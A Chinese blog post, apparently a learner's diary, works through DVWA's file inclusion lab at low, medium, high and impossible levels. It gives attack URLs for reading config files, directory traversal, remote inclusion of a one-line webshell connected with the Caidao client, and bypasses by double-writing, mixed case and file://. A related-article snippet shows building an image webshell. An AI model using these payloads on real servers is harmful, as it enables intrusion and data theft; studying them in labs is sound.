学习渗透日记5 文件包含漏洞

最新推荐文章于 2024-01-10 15:36:25 发布
最新推荐文章于 2024-01-10 15:36:25 发布
阅读量228 收藏 1
点赞数 2
文章标签: 学习 php 网络安全 服务器 windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56902810/article/details/130458756
版权
文章详细介绍了DVWA靶场中的文件包含漏洞,从低级别到顶级,展示了如何利用allow_url_include选项进行远程和本地文件包含,以及各种绕过方法,如双写、大小写和绝对路径绕过。同时,文章提到了信息泄露、文件执行和白名单、黑名单过滤策略的安全问题。
摘要由CSDN通过智能技术生成

还是以DVWA靶场为例

文件包含:当服务器开启allow_url_include选项时,可以通过某些特性函数如:include() , require() , include_once() , require_once() 利用url去动态地包含文件,若未对文件进行来源审查,就会导致任意文件读取或者任意命令执行。
分为本地文件包含和远程文件包含,远程文件包含必须开启PHP服务器的allow_url_include开关使服务器可以进行远程文件包含。

1.低级别:

首先打开页面源代码

这就是一个简简单单的文件上传界面,并未做任何的过滤。

然后看看文件包含界面的三个文件:

 

1,2,3的php文件是为了让用户点击服务器包含文件,服务器包含的这几个文件无论是什么后缀名都会以php文件呈现

此时输入url:

而一般情况下Linux的用户和密码信息都会在/etc/password,/etc/shadow下保存。shadow相对高级,所以用超级用户才能打开。

 由上图看很明显报错,表明系统的服务器不是Linux系统。但是又发现一个有意思的事,报错信息中出现了一个路径C:\phpStudy\PHPTutorial\WWW\dvwa\vulnerabilities\fi\index.php

这不就相当于暴露出来了一些信息

继续深入查看php.ini

http://192.168.111.139/dvwa/php.ini

换一种方式访问:

http://192.168.111.139/dvwa/vulnerabilities/fi/?page=C:\phpstudy\PHPTutorial\WWW\dvwa\php.ini

将这个C:\phpstudy\PHPTutorial\WWW\dvwa\php.ini接到page后面,会发现以下信息:

 也打开了原文件,信息泄露。再试试访问phpinfo,果不其然,

http://192.168.111.139/dvwa/phpinfo.php

再次换法访问http://192.168.111.139/dvwa/vulnerabilities/fi/?page=../../phpinfo.php

 

../../相当于回退了两个目录

接着把page后的参数修改一下,切换到百度;

http://192.168.111.139/dvwa/vulnerabilities/fi/?page=http://www.baidu.com

也可以跳转。

然后写一个一句话木马文件,放到刚才的网站根目录下:

 尝试访问一哈http://192.168.111.139/dvwa/vulnerabilities/fi/?page=http://192.168.111.139/1.txt

 

 发现txt文件被当作了php文件执行,配置菜刀:

连接菜刀,

连接成功,将我的电脑里的东西全部暴露出来了。

 2.中级别:

先看源码

 http://,https://,../ ,\..这四个被str_replace()函数替换成空字符,因此这些东西都无法直接使用了

所以此时应该选择合适的绕过方法:

双写绕过:http://192.168.111.139/dvwa/vulnerabilities/fi/?page=htthttp://p://192.168.111.139/dvwa/php.ini

果不其然也可以打开

 大小写绕过:http://可以换成大小写混合版

http://192.168.111.139/dvwa/vulnerabilities/fi/?page=hTtp://192.168.111.139/dvwa/php.ini 

绝对路径绕过,比如在C盘下直接创建一个php文件

 

 然后在page后直接访问:http://192.168.111.139/dvwa/vulnerabilities/fi/?page=C:\test.php

 

也可,所以中级别的包含绕过有三种方法:大小写,双写,绝对路径。

中级别类似于黑名单模式过滤。

3.高级别:

就先随便访问一个路径:http://192.168.111.139/dvwa/vulnerabilities/fi/?page=http://192.168.111.139/dvwa/php.php

虽然明知报错,但只显示了一个界面,连文件路径的报错信息都没了

继续先看源代码:

主要就是这个if条件中的东西。file*有点类似于通配符,fnmatch()感觉起来像匹配 。

大致理解为传入的$file是否匹配file*,成功则true。所以在接下来的文件包含就要以file://....的形式构造URL了。也就是大佬们的说法file协议绕过。

比如访问刚才的test.php:

http://192.168.111.139/dvwa/vulnerabilities/fi/?page=file://C:\test.php

刚才的一句话木马:

http://192.168.111.139/dvwa/vulnerabilities/fi/?page=file://C:\phpStudy\PHPTutorial\WWW\1.php

4.顶级:

先看源码:

这里的代码只包含了include,1,2,3这四个php文件,即所谓的白名单模式。未在白名单上的文件就无法包含。所以白名单模式比较安全,有效防止了文件包含漏洞。顶级和高级都属于白名单模式,不过顶级的过滤条件更加苛刻。

 Linux的话其实很像,不过是打开的文件在/var/www/html/下,其余的大同小异。

 

 

 

 

404_NOT_FOUND!!
关注
web渗透--45--报错信息测试
武天旭的博客
09-22 1308
1、漏洞描述 通常在Web应用的渗透测试中,我们会遇到很多来自应用或web服务器的报错信息。当使用一些用工具特殊处理过或人工编写的请求时,可能会触发这些错误显示。这样的报错信息对于渗透测试人员来说非常有利,因为其中包含了大量有关数据库、bug或其他与web应用直接关联的技术组建相关的技术信息。
PHP远程文件包含(RFI)并绕过远程URL包含限制
Ms08067安全实验室
04-06 1680
文章来源|MS08067 公众号粉丝投稿本文作者:VastSky(Ms08067实验室粉丝)前言本文我们讲如何绕过远程URL包含限制。在PHP开发环境php.ini配置文里”allow_u...
php文件包含
m0_64361111的博客
02-28 1445
概念 把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,无需再次编写函数。这一调用文件的过程被称为包含。 原理 文件包含漏洞产生的原因是在通过PHP函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件几乎所有的脚本语言都会提供文件包含的功能,但文件包含漏洞PHP WebApplication中居多,而在JSP、ASP、ASP.NET程序中却非常少,这是有些语言设计的弊端。在PHP中经常出现文件包含漏洞,但并不意味着其他语言不存在。泄露甚
文件包含漏洞
路漫漫其修远兮
12-13 669
就是采取了session的验证,session会存储到本地的文件中,我们通过修改session值后访问存储到session的本地文件就可以造成文件包含,但是有些session值采取的是临时存储,这个时候就会用到条件竞争(条件竞争这里我后面会用CTF的案列写出来,这里就展示一下session的利用)比如数据库连接单独存放在一个文件mysqli.php,其他文件需要用到数据库连接时直接调用mysqli.php文件,如果不是固定文件,而是用参数调用文件就会导致文件包含。包含的文件会以当前文件的语言来执行。
文件上传漏之Durian靶场练习(完整版)——学习日记-渗透day14
qq_62716256的博客
09-14 2007
文件上传漏之Durian靶场练习(完整版)——学习日记-渗透day14
渗透学习日记day20
qq_44836237的博客
02-15 842
制作图片马,比较老的技术了 之前用ew生成过,这里直接在cmd下执行: copy /b 1.jpg+2.php=3.jpg 文件上传+文件包含配合 upload-labs第14题: 成功上传之前的图片马 这里upload-labs目录下有个文件包含的文件内容如下: 抓包查看到文件上传成功后返回一个路径 因此我们上传图片马结合该文件包含即可成功解析里面的php语句 http://192.168.70.34/upload-labs/include.php?
DRXZ渗透工具
02-25
- **漏洞检测**:工具内置了多种漏洞扫描模块,能够识别常见的Web应用漏洞(如SQL注入、XSS跨站脚本、文件包含漏洞等)以及操作系统级别的安全问题。 - **弱口令测试**:DRXZ可能包含了对常见服务的弱口令字典,...
Metasploit渗透日记(三)
kopi_luwak的博客
07-15 205
情报搜集——漏洞扫描 项目简介 1、 OpenVAS简介 2、 OpneVAS的安装 3、 OpenVAS的使用 项目要求 硬件要求: 1、 Kali Linux系统的电脑一台 2、 局域网内的任何系统的PC,数量不限。 软件要求:(以下软件需要手动安装) 1、 OpnVAS 项目步骤 1、 OpenVAS简介 OpenVAS是一款类似与Nessus的综合性漏洞扫描器,主要用来识别远程主机、寻找主...
HTB打靶日记:Stocker
01-15
这个命令包含了全面扫描(-A)和端口扫描(-Pn),并设置了扫描速度为5(-T 5)。扫描结果显示了目标主机stocker.htb的相关信息,包括开放的服务和端口。 通过访问stocker.htb的web页面,初始并没有发现明显的漏洞...
PHP远程文件包含
04-29
什么是"远程文件包含漏洞"?回答:服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可去包含一个恶意文件,而我们可以构造这个恶意文件来达到邪恶的目的。
【DVWA】15. File Inclusion文件包含(xampp版PHP报错解决+Low+Medium)
最新发布
Zichel77的博客
01-10 1050
存在服务器文件包含漏洞时无论文件后缀是否是php,均当做php文件来执行。当服务器php配置中,allow_url_fopen和allow_url_include打开时,服务器会允许包含远程服务器上的文件。页面返回了报错,但同时也暴露了页面的地址D:\xampp\htdocs\dvwa\vulnerabilities\fi\index.php。以上的限制其实主要针对的是远程文件的读取,因此本地文件的读取依然不受限制。如果要破解对远程文件的限制,我们对http://进行改写即可,以下为例子。
Web安全领域的探索之远程文件包含漏洞(LFI)
Innocence_0的博客
01-18 1476
Web安全领域的探索之远程文件包含漏洞(LFI)
ThinkPHP文件包含远程执行漏洞分析
Fiverya的博客
12-13 1398
文件包含,代码执行漏洞漏洞编号:QVD-2022-46174
PHP 远程文件包含的介绍和代码防御
煜铭2011
10-07 2142
0x01 介绍        PHP 应用程序接收到外部输入,但在“require”、“include”或类似函数中使用该输入之前对其进行了错误的限制。在 PHP 的特定版本和配置中,这样就使攻击者能够指定远程位置的 URL,以便使用软件从该位置获取要执行的代码。在其他情况下,攻击者可通过与路径遍历相结合来指定本地文件,其中可能包含 PHP 可以解析的可执行语句。“PHP 远程文件包含”使攻
DVWA-文件包含漏洞
qq_43660551的博客
03-05 1万+
文件包含:当服务器开启allow_url_include选项时,可以通过某些特性函数如:include() , require() , include_once() , require_once() 利用url去动态地包含文件,若未对文件进行来源审查,就会导致任意文件读取或者任意命令执行。 分类: (1)本地文件包含 (2)远程文件包含:因为开启PHP配置中的allow_url_fopen选项,服务器允许包含一个远程文件。 一、low 看下服务器端核心代码:page为做任何过滤。
DVWA-File Inclusion(文件包含)
简简的博客
02-02 418
本系列文集:DVWA学习笔记 文件包含漏洞,是指当服务器开启allow_url_include选项时,就可以通过php的某些特性include(),require(),include_once(),require_once()利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。文件包含漏洞分为本地文件包含漏洞远程文件包含漏洞远程文件包含漏洞是...
php 远程文件包含配置项,文件包含漏洞总结 - ghtwf01 - Welcome to ghtwf01's blog
weixin_29246195的博客
03-11 546
文件包含简介服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大量的时间文件包含函数require()require_once()include()include_once()include和require区别主要是,include在包含的过程中如果出现错误,会抛出一个警告,程序继续正常运行;而require函数出现错误的时候,会直接报错...
本地文件包含远程文件包含(超详细,小白也彳亍!)
热门推荐
qq_45300786的博客
09-22 1万+
为了防止代码重复,我们就有了,文件包含。很多网页如果要用到很多同样的函数,那么我们就可以使用这个文件包含函数,就避免了每个网页又去重复造轮子。 在index.php文件里包含1.txt,而1.txt的内容是phpinfo(),include函数包含1.txt,就会把1.txt的内容当成php文件执行,不管后缀是什么。1.txt也好,1.xml也好,只要里面是php代码,然后有被include函数包含,那么就被当成PHP文件执行。 如果包含的文件不存在,就会出现致命的错误,并报出绝对路径,然是不..
深度解析:本地文件包含漏洞渗透测试策略
通过深入学习和实践本地文件包含漏洞的检测与利用方法,渗透测试人员能够提高自己的技能,同时也提醒开发者在开发过程中注重输入验证,以防止此类漏洞的发生。在CTF(Capture The Flag)竞赛中,理解和应对LFI漏洞也...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值